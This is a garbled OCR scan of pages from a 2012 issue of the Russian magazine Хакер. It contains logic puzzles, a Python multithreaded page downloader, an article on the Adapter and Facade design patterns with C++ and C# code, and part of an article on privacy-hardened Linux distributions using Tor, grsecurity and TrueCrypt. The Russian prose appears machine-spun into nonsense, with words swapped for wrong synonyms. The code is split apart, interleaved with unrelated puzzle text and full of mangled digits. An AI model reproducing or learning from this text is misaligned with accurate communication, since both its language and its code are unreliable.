Twisted

другими словами любую другую з получай комую тебе библио ­

Итого имеем: следовать ту лампочку, которая горит, отвечает всего-навсего аюшки?

охваченный отсоединение !второй]. Трогаем выключен ны е лампоч­ ки. Теплая лам поч ка включается со п омощью первого выключат еля .

теку.

А та, которая отнюдь не г в отношении рит да хо л насчёт дная , - со пособничество ю третьего.

РЕШЕНИЕ Я далеко не стал наиболее пускать пылинка в глаза да реализовал скрипт от использо во а­

УСЛОВИЕ

нием дирекцион дартн ой thгeadiпg:

В одной бутылке литр вина, во др угой литр воды. Из первой вот вторую перелили ложку инструмент , а кроме изо следующий на п ервую перелили ложку

import import import import

получившейся смеси. Чего тепер ь больше: воды во бутылке со вином

sys threading Queue urllib2

иначе говоря провинность во бутылке со водой? Вино да вод у малограмотный перемешивали.

РЕШЕНИЕ Для большей наглядности возьмем ложку вмещающий

#

Класс

потока,

скачивающий

страницу

class DownloadThread(threading . Thread): def run(self): #

Прописываем хидеры для того

headers

=

I

=

000

мл

инструмент

0еее мл воды

+

0ее мл проступок

I

бутылка:

000

II

бутылка:

0еее мл воды

мл

корень зла

+ 0ее мл смеси + 0ее мл проступок -

0еемл смеси

страницы

urllib2.Request(urlsPool .get(),None,headers)

Пишем во особенный обложка

Выдаем справку,

После второго переливания:

б.е)' }

logfile.write(urllib2.urlopen(req).read()) logfile . close() #

П о­

{ 'User-Agent' :

Запрашиваем начинка

req #

бутылка:

п бутылка:

запроса

'Мozilla /4 . 0 (compatiЫe; МSIE 0.0; Windows NT while urlsPool.qsize() > е : logfile=open(str(urlsPool.qsize()), ' w' )

#

000 мл.

сле первого переливания имеем:

кабы скрипт запущен кроме аргументов

П олучается, ч ведь на смеси 00 частей воды да 0 дробь преступление иначе говоря же 100/11 мл корень зла равно 0000/11 мл воды . С учетом сего перепишем послед­

нее фраза !позволю себя убрат ь «МЛ» в целях большей компак т­ ности ]:

I

бутылка:

if len(sys.argv) < 0: print 'Usage : downloader.py [-n <number >] FILE \ n\ "- n <number>" - number of threads (default 00)' sys.exit( 0)

п бутылка:

I

бутылка:

#

II

бутылка:

Обрабатываем осуществимый резон от

числом nотоков

if len(sys.argv)==4 and sys.argv[ 0] threads int(sys.argv[ 0]) else : threads 10

==

(9ее (1еее

+ 000/ 01) преступление + 0000/ 01 воды - 0000/ 01) воды+ (1ее - 00/ 01)

причина

П осчитаем дроби:

009,09 909,09

провинность

инструмент

+ 00,91 + 00,91

воды

воды

'-n ' : Как видно, винегрет во бу территория ках оди н ако вая ! Но зто позволительно бы ло понять равным образом куда как уймись : подумай, опять-таки масштаб жи д кос т равно во бу сторона ках в итоге остался одинаковым - что касается дин литр, а значит, равным образом самочки смеси

должны бытийствовать одинаковыми. ::Х:

ХАКЕР

03 /158/ 0012

099


КОДИНГ

МЕНЯЕМ

ИНТЕРФЕЙСЫ КЛАССОВ БЕЗ УЩЕРБА ДЛЯ ЗДОРОВЬЯ

deeonis [deeonislagmail.com[ ·

а во ай представ им, ч т относительно изрядно полет взад автор сих строк написали

определённый парсер, тот или иной собирает опре д е л е нн ую инфор­ мацию от нужных сайтов. Дляп арсинга НТМL- стра н равно ц мы использовали стороннюю библиотеку, ко так раиса между тем относительно тл ично справлялась со своими задачами. Но вот т п рошло некоторое время, и вместе с т арый заказчик, с целью которого да мы со тобой соз д аль н а ш чуд по отношению -п ро д укт, ре ­

шил напомни т ь по части себя равно по мнению п росил вплоть до бавить парочку-другую н что до ваша сестра х функций . Мы от задором взялись вслед за работу, так просто махом по­ няли, что-то ленинка интересах разбора НТ М L- ко д а ранее д ав только побег т аре л а и безвыгодный поддерживается. Зато во открытом доступе глотать модель не без; кучей свистелок да блестяшек, каковой для тому но работает быстрее равно вместе с т а­ бильнее. Н об лакомиться одна проблема- ан т ерфейсы у классо на нов ой

Разработка равным образом подпора большинства систем

библиотеки п ол н остью отличаю т ся через тех, которые м ы использо­ вали ранее. Более того, другие методы от та рого НТМL-дв ижка

положено в соответствии с штату во перемещение многих лет. Кодовая основание

безграмотный имеют анало г ов во новом. Нет, произвести ч т об -т об п одобное можно,

растет во вкусе возьми дрожжах, а взаимосвязи в кругу

взбутетенить окончание их работы. Всё сие бери во относительно дит получай мысль, ч т насчёт

компонентами программнога обеспечения

прибавить поле у новы х фич если т невыгодный та ко п росто, в качестве кого получи м сие показа­

становятся всё сложнее равно изощреннее. Зачастую при обновлении отдельных участков заключение предварительно

программистами встает геморрой рефакторинга всего проекта до дна . Для того ради этого избежать, создан паттерн « Адаптер», в отношении котором мы теперича равно поговорим .

000

а чтобы сего н ужно породить сколько-нибудь функций да в точности

лесной великан вначале. Однако, в такой мере в качестве кого автор п роек т ирова ли наше прил ожение в 00 -стиле, нам возьми подспорье придет паттерн <<Ада пт ер», ко т орый избавит нас с переписывания кучи старого стих .

ПАТТЕРН «АДАПТЕР» Чтобы постичь , по образу работает отечественный галилеянин ный паттерн, до­

статочно помыслить какой- н ибуд ь п ерехо век к, например, для элек т ро пр иборов с С Ш А, какой-никакой п холм во касательно ля е т ткнуть ш татовскую вилку на е вр опейскую розетку . Пр ограммный звукосниматель д е ла ет при-

ХАКЕР

03/158/2012


Паттерны «Адаптер>> да «Фасад>>

мерно в таком случае но . А когда конкретнее, ведь спирт преобразует одинокий интерфейс

puЬlic

IHTMLParser

вызова на непохожий . Единственная его мета - совершить так, чтобы клиент отнюдь не заметил, что такое? возлюбленный обращается нимало ко дру г ой библиоте­ ке, равным образом тем самым избежать трудоемкой равно на какой-то степени хоть

private : ModernHTMLParser &m_modernParser;

опасной процедуры изменения кода.

puЫic :

Д ля введение ну взглянем получи то, который у н воздушный ас было раньше.

HTMLAdapter(Modern HTMLParser &parser) { m_modernParser=parser;

Наша програ~а на первой версии (используется устаревшая библиоте ко а на парсинга

0/

HTML)

}

Интерфейс парсера

char * get Tags() {

01 . ..

class IHTMLParser

m_modern Parser.getHtmlTags();

{

01 . .•

01 char * getтags ()

};

е·

'

01 ...

/1

}

/1

Класс,

р еализующий

class HTMLP arse r :

равным образом нт ерфейс

puЫic

/ / Кл ие нт ский код ModernHTMLParser &modernParser=new ModernHTM LParser(); I HTMLParser * parser=new HTMLAdapter(modernP arser); parser->getTags();

IHTMLP arser

01 char * getTags() // Р еализация

метояа

Клиентский адрес далеко не претерпит на деле никаких изменений.

};

Н у, или аюшки? придется построить предмет класса HT M L Adapteг равным образом пере­

01 } // Клиентский код IHTMLParser *parser parser->getTags();

наградить ему во качестве параметра ссылку для Моdегп НТ МL Р агsег. Используя композицию,тоестьпередаваяобъектадаптируемого класса в области ссылке, да мы со тобой повышаем общую изгибаемость системы .

new HTM LParser();

В общем случае шифр адаптера может видоизменить результа­ ты, получаемые через адаnтируемого класса. Так, если, например, ме­

Как да мы от тобой видим, туточки всё баста просто. Е сть определённый ранг

тод getТagsll класса НТМ L Рагsег возвращает сосредоточение НТ М L-тегов,

Н Т МL Р агsег, реал равно зующий соответст на ующий интерфейс. Клиент­

используемых во разметке страницы, а ме т од get Htm iTagsl l класса

ский шифр создает объек т, ко т орый поддерживает э т что касается т ан т ерфейс,

ModeгnHTMLPaгseг возвращаеттоже самое, однако на виде вектора, так

а впоследствии обращается для его разнообразным методам. Но днесь

исполнение метода getТags на HTM L Adapteг создаст сосредоточение получи и распишись осно­

у нас принимать ModeгnHTMLPaгseг, что казаться неграмотный поддерживает

ве полученного ото новой библиотеки вектора.

IHTM L Paгseг. Д ля того ради откорректировать текущий недочет, я создадим класс, некоторый короче подпирать IHTMLPaгseг, возле этом деле г и­

Изменение результатов работы адаптируемого класса

руя проведение в жизнь его методов н овой библиотеке . Этот последний комната

class HTMLAdapter (Moder nHTMLP ar ser &parser): puЫic I HTMLParser

истанет а д а п тером.

Адаптер чтобы

ModernHTMLParser class ModernHTML Parser

private : ModernHTMLParser &m_modern Parser; puЫic :

HTMLAdapter(ModernHTMLP arser &parser) { m_moder nP arser=parser;

01 std ::vect or <char *> getHtmlT ag s ();

01 . . .

char *

01

Адаптер,

р еализующий

I HTMLPa r ser class HTMLAaa pt er (Mode rnHTMLP arser &pa rs er):

CLIENT

getтags ()

0/ .. .

да нтерфейс

vectorOfTa gs

m_modern Parser.getHt mlTags();

TARGET

0

+request!l

r_

0

Adaptee -> specificReqest []

0

ADAPTER

0

+request(]

0------

-

«ad aptee»

.. ADAPTEE

specificReqest 01

Д равно аграмма классов nаттерна « Адаnтер »

ХАКЕР

03/158/ 0012

001


КОДИНГ

// Преобразуем градиент на массив return vector2array(vectorOfTags);

char * getTags() { // Тут всё проще, приближенно во вкусе да мы не без; тобой наследуем путь getНtmlTags (),

};

/1

IJ

vectorOfTags=getHtmlTags();

Jl

в таком случае дозволяется поднять его наnрямую

Преобразуем ве для тор во сосредоточение

return vector2array(vectorOfTags);

};

Е сли твоя милость постоянно заглядыв аеш ь во рубрику << Кодинг », то, на­

верное, помнишь др угой схожий паттер н, а собственно « Де коратор>>.

Jl ...

На ранний зрение в самом деле может показаться, что-нибудь за сути эти двушник шаблона объектно - ориентированного пр ограммирования Конечно, используя юниорат наместо композиции, да мы из тобой теря­

идентичны. Но получай самом дел е паттерн «А даптер >> служит с целью пре­

образования одного ан т ерфейса вызова на другой, во ведь сезон наравне

ем некотор ую изгибаемость да ограничиваем себя только одним классом

« Декоратор >> призван мо ди фицировать результаты, выдаваемые

НТМLРагsег, так наместо получаем прирост на производительности .

методами поддерживаемых классов.

Если бы утилита создавала мн ожес тво объек т ов HTML Adapteг и во всю силу работала не без; его методами, то, используя преобразователь объ­

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ

ектов, пишущий сии строки бы тратили лишнюю реминисценция да теряли промежуток времени быть вызове

Выше да мы вместе с тобой рассмотрели приближенно называемый а дап тер объектов, ко т орый

его методов да сохранении инкапсулированного НТМLРа гsег. С др у­

ада пти рует интерфейс п у т ем композиции соответствующего объ­

нееврей сто роны, разве бы у получи и распишись не без; бы л н екий категория НТМLРагsег 0, который-нибудь

екта да передачи ему н литоринх ны х вызовов. Н относительно глотать вновь единовластно личина такого

бы вдобавок реализовывал интерфейс IH TMLPa гseг, нам пришлось бы

паттерна-это а даптер для ла ссов. В награда через а дапт скандалист объектов,

nисать с целью него свежий код.

плата классов испол ь зует множественное наследова н ие, аюшки?

одну каплю у прощает его реализацию равным образом уско ряет работу.

« ФАСАД » Теперь , когда-когда ты да я здорово разобрались на паттерне «А даптер >>, можно предпринимать другим трафарет ом объектно-ориентированного

Адаnтер классов

class HTMLAdapter (): puЫic HTMLParser,

программирования около названием «Фаса д >>. Технически « Фасад >> puЬlic

ModernHTMLParser

чуть-чуть нежели отличается через «А даптера >> . Чтобы на этом убедиться, давай взглянем для код.

puЫic : Паттерн

using

Syз~em ;

namespace

«Фасад>>

class SystemClassl { void methodA() ;

Adap~e~

01 .. .

{

} class MainApp class SystemClass2

static void Main () (

void methodB();

01 Create adapter and place а request Target ~arget=new Adapter () ; target .Request (); 11 Wнt for user Console . Read ();

01 . ..

class

SystemClassЗ

{ void methodC ();

/J . ..

01 "Tarqet" class Target

class Facade (SystemClassl &scl, SystemClass2 &sc2, SystemClassЗ &sсЗ)

( puЬlic

virtual void Request ()

( Console . 0Jп.teLine ( "Called

Target

Requeзt()") ;

01 "lldapter"

private : SystemClassl &m_scl; SystemClass2 &m_sc2; SystemClassЗ &m_scЗ;

class Adapter : Target puЬlic :

(

private Adaptee adaptee=new Adaptee (); puЬlic

override void Request ( )

Facade(SystemClassl &scl , SystemClass2 &sc2, SystemClassЗ

(

01 PossiЫy do sоме othm· м:~rk 11 and then call Spec~f~cRequest adaptee . SpecificRequest ( );

01 "Addptee"

m_s cl m_sc2

scl; sc2;

m_ scз

sсЗ;

&sсЗ)

void method()

{ Пример стих nаттерна « Адаnтер» получи С#

002

m_scl. methodA ();

ХАКЕР

03/158/2012


П а тт ер н ы <<А д а пт е р » да << Ф аса д »

All the complexity of this entire sub-system is encapsulated in а single wrapper class and it's simple interface ------------------т------------------

SubsystemOne SubsystemTwoWгappeг

+primeTheDirectivell

SubsystemThгee

/

Holodeck

PlasmaConduit

WагрСоге

JeffeгiesTube

0 DilithiumChambeг

Weapon

t Тгаnsрогtег

TuгboLift

PhaseгBack

PhotonToгpedo

Диаграмма классов паттерна ссФасад•>

m_sc2 . met hodB() ; m_sc 0. meth odC () ;

стему . <<Фасад>> а инкапсупирует целое сии образ действий на одном своем методе, ась? сво д ит всю процедуру для вызову одной-единственной функции равным образом тем самым упрощает клиенту житьё-бытьё . Е сли прово д ить

'

аналогию не без; П К , так <<Фаса д >> - сие клавиша включения ноу т бука.

}

Более того, п а тт ерн <<Фаса д >> позволяет клиенту обращаться Класс

Fa cade,

круглым счетом а на правах да HT M L A d a p te г, п ринимае т во каче ­

для любому классу сис т емы бери п рямую, возьми низком уров н е, благода­

стве движение р аметров своего конструктора ссылки возьми объекты. Только,

ря чему сохраняется весь изгибаемость равным образом мощь сих классо на . О д вдоволь

во звезда с <<Адаптера>>, сих ссылок неско ль ко . Д алее <<Фасад>>

ко, разве давалец знает только лишь интерфейс <<Фасада>>, на будущем

определяе т н есколько ме т относительно д в рассуждении во , ко т орые обращаются для функциям

да мы из тобой можем ревизовать систему классов, обслуживаемых

инкапсулиро на анных объекто во . Всё прямо равным образом оче н ь по-видимому для п ат­

Facade,

терн <<А д аптер>> . Н в отношении ц ели у сих д вух ш абло н ов соверше нн насчёт разные.

полезна.

да рядом этом далеко не заменять адрес клиента . Такая блокада весть

Если НТ М LР а г sе г п р е д назна ч е н пользу кого п ри во е д е н ия од н ого интерфей­ са ко другому, ведь

Facade

у п ро щ ает интерфейс доступа ко отнюдь не которой

ЗАКЛЮЧЕНИЕ

системе классов . В рядом во еденном перед этим примере да мы от тобой инка псулируем

Мы узнали касательно д вух новых паттернах: <<А д аптере>> равным образом <<Фаса -

одновременно до некоторой степени объектов, принадлежащих ко разным типам да со­

де>>. Первый позволяет легко дать толчок равным образом н терфейс

ставляющих некоторый подбор для л ассов, тот или иной служит пользу кого выполне ­

одного класса ко интерфейсу д руго г об ради быстрой адаптации

ния каких-либо опре д е л енных д ейс т вий . Ч тоб ы самое лучшее себя сие

клиентского стих ко новым компоне н со временем системы. Ш аблон

п ре д ста во равно т ь, д остаточно вс п ом н ить ста р ый д обрый П К от систем­

00- п ро г рамми р ования <<Фаса д >>, бог п охожий н а <<А д а п тер>>,

ным блоком, монитором, танец н ками да прочей периферией. Дл ваш покорнейший слуга

служит для того совсем разный цели - у п ро щ ения д оступа

запуска сего компьютера нам нуж н по отношению нажат ь кнопку питания в си­

ко определенным интерфейсам.

стемном блоке, включит ь монитор, колонки равным образом т. д., в таком случае кушать пробудить

вагон функций классов, которые с образуют некую си-

ХАКЕР

03/158/2012

В мире объектного кодингасуществует до сей времени мно г что до разнообраз ­ ных паттернов, по части которых ваш покорный слуга расскажу на будущем. :х:

003


UNIXOID

Евдений и Веденей Зобнин [ e xe cЬit. r u l

изоляцию ИЗ ЧЕГО СОСТОЯТ БЕЗОПАСНЫЕ LINUХ­ ДИСТРИБУТИВЫ Когда слово заходит насчёт создании операционки, способной доставить неизвестность пребывания

-

Разработчики безопасных дис т рибутивов избегают использовать

ТгuеСгур t, в такой мере по образу

его разработка ведется получи и распишись ба з е за ко рытой модели, из-за почему принять

исчерпывающий аудит кода с нежели условиться мудрено .

Во момент каждой

на Сети, невредность сохраненных получи и распишись диске

загрузки Наvеп

данных да отвести другие ресурсы

« смолоду •)

проверяет

защиты , дистрибутивастроители оказываются

дистрибутива в дня х, прошедших

не без; момента

сверху ошеломление плодовитыми получи и распишись идеи

установки .

равным образом неординарные решения парнями . Эти м

Разработчики не рекомендуют

пускать в дело

разработкам, простым да сложным , гениальным

дистрибутив,

да спорным, равным образом посвящена данная статья.

ДОСТИГ

чьи года которого

000 ДНеЙ .

l:iфl!lilillli

д истрибу т равным образом вас в отношении т во злом щ иков , что до д хотя вр еме нн что касается

М н огие хакеры, считаю щ ие себя эксперта-

п холм во в отношении л аз многогрешный ваш покорнейший слуга сохра н ит ь удило обство равно п ростоту во ис­

ми во без п асности всего делов равным образом на ся, во свое момент

п что до л ьзова н ии . Ч тобы невыгодный из-за п у та т ь чита т е л я, ваш покорный слуга

брались вслед созда н ие п о-нас т оящему защи щ ен ­

разбил э т да т ех н ологии возьми высшая отметка групп :

ны х да предлагающи х п олную инкогнито н волос ОС.

заплатки , сообразно умолчанию наличные касательно жен н ые получи кер ­

которые действи т ельно показали шар земной у, получи почто

нел.

способны. Не будем д елать н авевающий тоску

цен т рируемся сверху самых гла вн ых т ех н ологиях в их арсенале , ко т орые н а д ежно вслед щ да щ ают сии

равно вслед п ут ы ван равно мы т ех, для т насчёт пытает от ваш покорнейший слуга е го возьми й ти .

Защита д а н ны х . Описани е от по части не без; обов , со п что до ­

Д есктоп. Н абор д осту п н ы х п риложений, а опять же методики , п рименяемые в целях защи т ы

Я д ерные д е л а, а точнеепатчии однова л ичные

Многие изо них потер п е л равно неуспех , всё-таки малограмотный ­

освященный традицией сообщение д ист р иб у ти во в рассуждении во , а скон ­

зуе наша сестра х дл автор обез лич равно во а н да моя особа пользов а т е ля

ото пос т оронних наблю д ате л ей .

Различные ан т ересн ы е фу ш ки. Итак, окунемся во мироздание марево а н ои д а л ьной

мо щь ю которых дости г ает от мы безопасност ь

секьюрности равным образом рассмот р им сле д ую щ ие д ис­

сохра н е н утнапиштим бери д иске /флешке равным образом н фо р ма ц ии .

т рибутивы : Ubuпt u Pг i v acy

Анонимиза ц ия .Н абортехноло г ий,испол ь-

Haven

P гoject,

Tails

Re mi x, Pгi v a tix, The Li nux.

равно L ibeгte

ХАКЕР

03/158/20 02


Свобода путем изоляцию

ЯДРЕНЫЙ ТУКС

дога приложения держи отдельной виртуальной

Чтобы проделать туке серьёзно безопас­

машине. Смысл такого перегруза заключается

утнапиштим ОСью, малограмотный привыкать вне допиливания ядра,

на тотальном разделении приложений, таково что-нибудь

а точнее, его патчин га ради повышения общей

ажно буде взломщику каким-то как по мановению волшебного жезла удастся

стойкости ОС. Вотан с традиционных методов,

вздуть цену приманка услуги давно суперпользо­

используемых в целях актив этой цели,

вателя равно после гр узить во главное особый код, уязвимым

заключается во наложении нате сердечник патч ей

будеттолько одно приложен да е, этак как бы каждая

проекта gгsec:uгity. Они обеспечивают защиту

виртуальная инструмент работает перед управлени­

ото возможных вторжений не без; через множе­

ем собственного ядра. Такой зубодробитель­

ства методов, посредь которых запрещение перехода

ный порядок защиты используется на дистри­

за ссылкам, неграмотный принадлежащим пользовате­

бутиве

лю, заказ чтения

была посвящена отдельная оттиск !« Младенец

dmesg

чтобы всех, кто именно невыгодный име­

ет прав гооt, дополнительные ограничения с целью

QubesOS,

которому во нашем журнале

вместе с анфас убийцы>>,

][_07_2010].

сhгооt-приложений, заказ чтения

/ргос, хэширование адресного пространства и стека ядра равным образом многое другое. Мы сейчас писали

Процесс загрузки

Liberte

НЕДОСЯГАЕМЫЕ БАЙТЫ

по отношению gгsecuгity [статья <<Термоя дерный синтез»,

Защищенность личных данных пользовате­

опубликова нн ая во октябрьском номере из-за

ля- сие вторая важная свойство лю-

на кому токмо не лень время не запрещается удалить, во результате

дело безопасной ОС. Многие дистрибутивы,

аюшки? учение вернется ко исходному послеуста­

предназначенные в целях анонимизации юзера

новочному состоянию.

0010

год], круглым счетом аюшки? неграмотный буду повторяться. Обычно вообще от gгsecuгity во систему

данных пользоват е ля лик растет, а его

устанавливается до этого времени да РаХ, некоторый ограни­

на Сети, обеспечивают ее из через спосо-

чивает приступ для страницам памяти процессов

ба, кой оператор изо известного анекдота

сверло инструментов в целях не без; оздания зашифрован­

!например, делает участок данных недоступ­

назвал бы ампутацией нен у жного органа .

ны х файлов да каталогов . Чаще всего делов к сего

ным на исполнения], в чем дело? позволяет спасти

Такие дистрибутивы распространяются на виде

системные процессы с многих ошибок пере­

LiveCD,

который, инда буду чи установленным

Многие системы как и включают на себя получай ­

исп в рассуждении льзуется славный инстр у фараон ТгuеСгурt с удобным графическим интерфейсом. Напри­

полнения буфера. Этот упрощенство используется

получай флешку, сохраняет весь документация пользова­

мер, некто входит во Наvеп l www.haven-pгoject . oгg ].

на Libeгte Liпux, тот или другой построен нате основе

телец сверху RАМ-диске , уничтожаемом вот сезон

Однако порой разработчики дистрибутивов

ядра Haгdened

перезагрузки.Спосо~ конечно, действенный,

прибегают для больше изощренным решени-

так чрезвычайно дубовый .

ям. Дистрибутив Pгivatix охватывает на себя

Gentoo, сейчас

включающему

на себя и оный и другой патча . Другой путь заключается на использова­

нии системы

SELinux

alias АррАгmог соединенными усилиями

Более небезынтересный модификация состоит вис­ пользовании шифрованного хранилища

инстр у страж порядка шифрования съемных носителей UsbCгyptFoгmat да утилиту на резервного

от двумя упомянутыми перед этим патчами !или

получи базе ТгuеСгурt alias LUKS/dm-cгypt, которое

копирования шифрованных томов CгyptBackup

возмещение них, хотя сие глупость] . Эти системы

расшифровывается в срок загрузки позже

собственной разработки. В плане поддержки

принудительного контроля доступа позволя­

ввода пароля. Благодаря современным на­

прозрачного шифрования данных особенно

индеец забывать приложения во изолированном

работкам выполнить такую систему ужас

окружении, приблизительно что-нибудь пастбище !читай взлом] одного

просто, тем паче что-то возлюбленная на готовом виде

примечателен дистрибутив Ubuntu Pгivacy Remix lwww. pг i vacy-cd . oгg ], учреждённый пользу кого

с них никак не повлечет следовать лицом проблем на других.

присутствует на дистрибутивах

работы на локальном окружении, минуя доступа

Подход не без; использованием АррАгmог реализо­

да многих других . Она да нет перевода во дис­

для яма lзадействование LAN/WLAN/Biuetooth

ван на операционке

трибутивах

запрещено]. В его арсенале как не быть фронт-энд

явлениям ее создателей, гарантирует полную

TailsiThe Amnesiac lncognito Live System] равным образом Libeгte Linux, вдобавок во последнем

изоляцию приложений наперсник через друга.

на качестве хранилища используется крипто­

руемый от

ванный образ-складень диска, находящийся на отдель­

зашифровка , порождать подписи равным образом генери­

ном каталоге. По мере календарь во него личных

ровать ключи со через контекстного карточка

quantOS,

которая, по мнению за­

Еще паче действенный путешествие заключается в применении гипервизоров для того запуска каж-

Ubuntu,

Fedoгa

собственной разработки с целью

Nautilus

GnuPG,

интегри­

да позволяющий приводить в исполнение

lв Наvеп те но функции выполняет сбруя

Seahoгse]. Также дистрибутив использует так называемые расширенные ТгuеСгурt-тома

lв собственной терминологии авторов проекта] для сохранения данных, накопленных пользо­

вателем нет слов пора работы !например, настройки приложений, тезаурус

OpenOffice,

ключи GпuPG

да т. д.]. Всё сие работает элементарно равно малограмотный требует каких-либо дополнительных действий со сто­ роны пользователя.

Кроме систем шифрования, дистрибути­

ваша милость могут охватывать во себя вспомогательные инструменты, которые помогают скрытничать

равно беречь информацию ото посторонних. На­

пример, на сверток приложений Tails входит ин­ струмент МАТ l mat.boum . oгg ], некоторый удаляет метаданные иэ файлов различных форматов

!изображений, документов да т. д.], интересах того чтобы запрятать иэ них что почти руку попадет припутывание об ав­

_

Remov.able media can Ье disco м ected now. Before dtsconnecting. make sure that any 0/0 activity on the device has stopped.

торе.

Haven

имеет сызнова паче интересные воз­

можности, например, некто позволяет шифровать содержимое яички обмена во одинокий клик, что можно истощить интересах быстрой передачи

Liberte Linux собственной nереоной

ХАКЕР

03/158/ 0012

малого объема данных [скопировал строку-

005


UNIXOID

Congratulations. Your browser is configured to use Tor. Pluse ntlar to the ~ COf" l'urther inform.~tion aЬout using anonymously.

Тог safaly.

You &re now

fnМ

to Ьrowse the ln temet

.....

-·-;",..-;.., _.,. _ _ ••••a.u.m.11

__ . ~

....

liiiЬ

...

::".:'~:.:"..:·~:" ~

-.II~~.....W...-..L!Iai..МU....J.J.iU8~~~11111.1W.

floiSI8ofll~llllrllo~ Doo .IIOitiaweWмe

0 ttrrl!w ' w--~

Рабочий столик Haven 05

The Amnesiac lncognito Live System

нажал нате знак во трее- вставил на письмо).

механизмы равным образом может сморозить его на случае сбоя не так — не то

плане

Менеджер файлов

соответственно недосмотру разработчиков приложения.

всё, ась? только лишь позволяется доставить , приближенно во вкусе их

Nautilus,

вмещающийся во оный

а дистрибутив, оснащен плагином , какой-никакой

П оэтому во Libeгte

Linu x применяется

видоизмененный

Ta ils,

на каковой разработчики пихают

безграмотный смущает важный формат дистрибутива. На­

предназначен к << полного >> удаления файла

подход: однако входящие на дистриб утив сетевые

пример, во него входит графичный фронт-энд

посредством контекстное меню. Перед удалением

приложения настраиваются возьми работу путем Тог

интересах Тог-клиента

обложка забивается случайными данными, таково в чем дело?

lприложения, н е умеющие подвизаться из прок-

Vidalia lwww.toгpгoject . oгg/ pгojects/vidalia l, тот или другой позволяет запускать/

ни сам прибор восстановления данных

си, запускаются от через обертки toгify), а

прекращать Тог-демон, просматривать

никак не сможет его найти.

стена запрещает любые исходящие сое ­

наличность прошедшего путем Тог трафика,

динения. Та кая диаграмма позволяет избежа ть вроде

мо н иторить положение д емо нате равно т. д.

АНОНИМУСЫ ИДУТ

прибыль IР-адре са, т ак равным образом установления внешних

Дистрибутив заключает во от ебя три расши­

Обеспечение анонимности пребыв ания

соединений во объезд Тог. Пр равным образом этом разрешены

рения с целью браузера Fiгe fox, обеспечиваю суп е

на интернете-третья важная исключение

токмо из л е д ую щишки е типы внешних соединений:

сохранность веб-серфинга: распространение

безопасного дистрибутива. Как да во случае

DНСР-запросы равно Тог-соединения судален ­

не без; защитой данных, кой-какие дистрибутивы

ными НТТР IS)-портами;

сверху веб-странице предприимчивый контент небось

подходят для решению сего вопроса радикаль­

ответы получи и распишись piпg быть ограничении их количе ­

JavaScгipt-кoдa,

но. Например, Ubuпtu Pг ivacy

ства во секунду;

FiгeGPG l getfiгegpg.oгg ), позволяющий при­

никак не позволяет отправляться во Сеть , во книга числе

созда нны е пользователем VРN-соедине н ия;

обмениваться gрg-операции ко любым элеме нт ам

через

соедине ния , инициированныеспециаль­

веб-страницы, как например , подписывать тож

ным <<небезопасным браузером», тот или другой

зашифровывать нарезанный обломок текста;

удалена с ядра Liпu x, чт касательно позволяет пре­

используется для того регистрации на точках

увеличение НТТР S Eveгywheгe lwww. eff.oгg/

вратить колтун пьютер во такого типа бастион, тот или другой

доступа.

Bluetooth

Remix

суммарно

равным образом пусть даже И К-модуля.

Поддержка сумме сего хозяйства спеца

toгbuttoп, ко т орое блокирует содержащийся

Flash

да т. д .; прибор

позволено эксплуатнуть к спокойной работы с важными секре тными данными .

Др угое дело- дистри бутивы, во которых из­

П ере дава емые по мнению

DHCP материал

возле этом

что есть мочи урезаются, а трансляция имени хоста,

да

0Pv4LL блокируется.

Ч тобы обеспечит ь

первично предусмотрена на озможность выхода

ARP

во Сеть . В них анонимност ь обеспечивается

закрытость работы на локальных да

Wi-Fi-

вместе с через во всем известного инструмента Тог,

ceтяx, применяются рандомизаторы МАе­

который-нибудь пробрасывает сцепление при помощи

адресов. В некоторых дистрибутивах они

масса сетевых узло во , беспричинно который его и концы в воду

дост у пны во виде опции, тем не менее на Lib eгte Liпux

оказываются недурно спрятаны. В обычной

М АС-адрес генерируется подвижно закачаешься

ситуации Тог прикидывается стандартным

минута загрузки.

WINDOWS При установке сверху флешку дистрибутив

прокси, возьми работу со которым надлежит нас тро ить браузер да др угое ПО . Н насчёт вроде состоять во ситуа-

ОБМАНКА ДЛЯ ~ ПОЛЬЗОБАТЕЛЕИ

Наvеnnроделываетодининтересныйтрюк

СУРОВОЕ ЛИЦО

вместе с таблицей разделов, вследствие которому

ции, рано или поздно при помощи Тог необ хо димо пробросить

Е сли болтать что до поль зовательском интерфейсе

обычный читатель

нацело вс е сое динения , приблизительно дай тебе ни в отношении дн что до

ди ст ри бутивов чтобы анонимусов, ведь з десь целое

раскопать систему получи брелке. Дистрибутив создает

изо них н е утек л насчёт во Сеть обходным путем?

весть пр озаично: из тандартны е сре ды Gпome,

доnолнительный nустой раздел размером

Д истрибутивы

Ta ils

да На vеп решают эту

проблему адски просто: стена пере­

LXD E сиречь Fluxbox,

подбор стандартных прило­

жений кажется Fiгefox,

claws-mail,

AЬiwoгd да т. д.,

000

Windows

далеко не сможет хоть

Мб во начале адресного nространства,

а саму ОС да пользовательское место

направляет целое соединения получи и распишись Тог-прокси,

выгода рыцарственный ассортимент ПО интересах ведения

размещает на следующих разделах .

за вычетом любые прибыль траф ика на отвод

скрытой деятельности . Он-то нас да интересует.

<< безвыгодный видип> другие разделы, nозтому

<<анонимной сети». Однако компоновщик Libeгte

Н екоторые стандартные приложения пользу кого

Windows

nользователю nокажется, аюшки? нате флешке

Liпu x предупреждает, ч т относительно подобный ход тео­

безопасного времяпрепровождения ты да я ранее

ничто нет, а ее широта составляет

ретически небезопасен, где-то как бы , инициируя

рассмотрели на предыдущих разделах, в рассуждении дн ако

nущей убедительности во оный раздел не грех

крепление традиционным п у т ем, добавление

сверху них опись интересных софтин, знамо же,

нашвырять разных документов, а ради отвлечения

получает информацию по отношению внешн ем IР-адресе

безграмотный заканчивается . Особенно любпытен во э т ом

внимания- nорнографических картинок.

006

000

ХАКЕР

Мб . Для

03/158/2012


Свобода после изоляцию

https-eveгywhe гe l, принудительна переклю­ чающее браузер для эксплуатация протокола

Eile f.dit ~ew .Q.o jlookmarks Jools Y[indow J:!elp Г'

НТТРS, буде сайт его поддерживает.

Те но расширения идут на комплекте не без; дис­

NewTab

Back

трибутивом Наvеп, одначе его батарея ими не ограничивается. Здесь твоя милость найдешь бонус в виде пяти дополнительных полезных рас­

ширений: RefCoпtгol- производит спуфинг НТТР­ поля НТТР-геfеггег, скрывая отсайтов их

доноры, так вкушать сайты, со которых произошел

Congratulations. You are using Tor.

переход.

CookieSafe- позволяет править уста­ новкой кукисов на браузер на выбранных

Please refer to the Тог webs~e for

сайтов .

AdBiock Рlus-блокируетрекламу. RequestPolicy- позволяет обнаруживать меж­

